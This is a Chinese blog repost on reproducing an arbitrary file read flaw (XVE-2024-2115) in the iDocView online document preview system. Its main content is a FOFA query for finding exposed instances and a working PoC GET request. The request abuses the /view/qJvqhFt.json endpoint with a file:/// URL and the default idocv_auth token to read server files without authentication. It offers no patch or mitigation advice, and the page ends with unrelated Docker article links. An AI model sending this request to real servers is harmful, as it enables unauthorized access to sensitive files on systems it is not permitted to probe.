首页 > 其他分享 >I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞复现(XVE-2024-2115)

I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞复现(XVE-2024-2115)

时间:2024-06-06 15:59:32浏览次数:28  
标签:预览 Doc qJvqhFt 漏洞 json 文档 复现 XVE

0x01 产品简介

iDocView是一个在线文档解析应用,旨在提供便捷的文件查看和编辑服务。

0x02 漏洞概述

iDocView是一个在线文档预览系统 /view/qJvqhFt.json 接口处存在任意文件读取漏洞,未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息,使系统处于极度不安全的状态。

0x03 复现环境

FOFA:title=="在线文档预览 - I Doc View"

0x04 漏洞复现

PoC

GET /view/qJvqhFt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Sa

标签:预览,Doc,qJvqhFt,漏洞,json,文档,复现,XVE
From: https://blog.csdn.net/qq_41904294/article/details/139501189

相关文章

  • 巧用docker+jmeter快速实现分布式百万级并发
    分享背景碰到的问题:一个JMeter实例可能无法产生足够的负载来对你的应用程序进行压力测试~解决办法:1、修改jmeter配置文件里的内存堆2、引入jmeter分布式压测带来的问题:如果我们要做分布式负载测试–我们需要1个主机和N个从机来产生巨大的负载。每台JMeter从机都需要......
  • DockerCompose中部署Jenkins(Docker Desktop在windows上数据卷映射)
    场景Docker+Jenkins+Gitee+Maven项目配置jdk、maven、gitee等拉取代码并自动构建以及遇到的那些坑:https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/128399052Windows10(家庭版)中DockerDesktop(docker)的配置、安装、修改镜像源、使用:https://blog.csdn.net/BADAO......
  • docker
    查看linxu系统:lsb_release-aDistributorID:UbuntuDescription:Ubuntu22.04.4LTSRelease:22.04Codename:jammy1、安装docker:1.1更新软件包:sudoaptupdate#从包管理器(APT)下载最新的包列表,获取是否有任何新的或更新的包可供安装或升级。......
  • Linux 安装 docker-compose
    什么是DockerComposeDockerCompose是一个单独的开源项目,DockerCompose可以高效管理和定义多个容器作用:批量容器编排web服务、redis、mysql、nginx等等多个容器docker-compose.ymlversion:'3.1'services:web:build:.ports:-"5000:5000"volumes:-.:/code-......
  • 如何解决 Docker Compose文件无法拉取:解决运维技术领域的Bug :Failed to pull Docker C
    如何解决DockerCompose文件无法拉取:解决运维技术领域的Bug:FailedtopullDockerComposeYAMLfilefromGitHubrepository原创作者:猫头虎作者微信号:Libin9iOak作者公众号:猫头虎技术团队更新日期:2024年6月6日博主猫头虎的技术世界......
  • 新建 DOCX 文档
    三元运算符packagestep4;importjava.util.Scanner;publicclassTestYear{ publicstaticvoidmain(String[]args){ Scannersc=newScanner(System.in);intyear=sc.nextInt();booleanresult;/********start********/result=(year%400==......
  • Docker Hub 国内镜像设置方法,解决Docker镜像拉取失败
    由于某些原因,DockerHub官方仓库在国内已经无法拉取,如果是国内网络环境,可配置国内镜像使用,从而解决Docker镜像拉取失败或缓慢问题。配置Docker镜像源如果不存在/etc/docker/daemon.json这个配置文件,可以直接使用下面的命令:#创建目录sudomkdir-p/etc/docker#写入镜像配......
  • 04.docker的主要组成部分
    docker体验docker是传统的CS架构分为dockerclient和dockerserver,跟mysql一样查看版本命令:dockerversion查看docker下载的是社区版,ce代表社区rpm-qa|grepdocker查看docker系统命令dockersystemdockerinfo(如果要做监控)docker主要组件docker主要组件有:......
  • 构建HTTP Server容器Docker构建一个简单的HTTP Server。
    构建HTTPServer容器Docker构建一个简单的HTTPServer。HTTPServer在访问根路径/时返回"Hello,World!"。提供完整的Dockerfile和启动命令。步骤1:创建HTTPServer的Python脚本首先,创建一个目录来存放HTTPServer文件:mkdirhttp_servercdhttp_server在这个目录中,创建一......
  • Docker 启蒙教程 (1)
    Docker启蒙教程(1)本教程致力于以通俗易懂的方式使读者上手Docker。本文使用CentOS7系统演示。第一章什么是DockerDocker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器......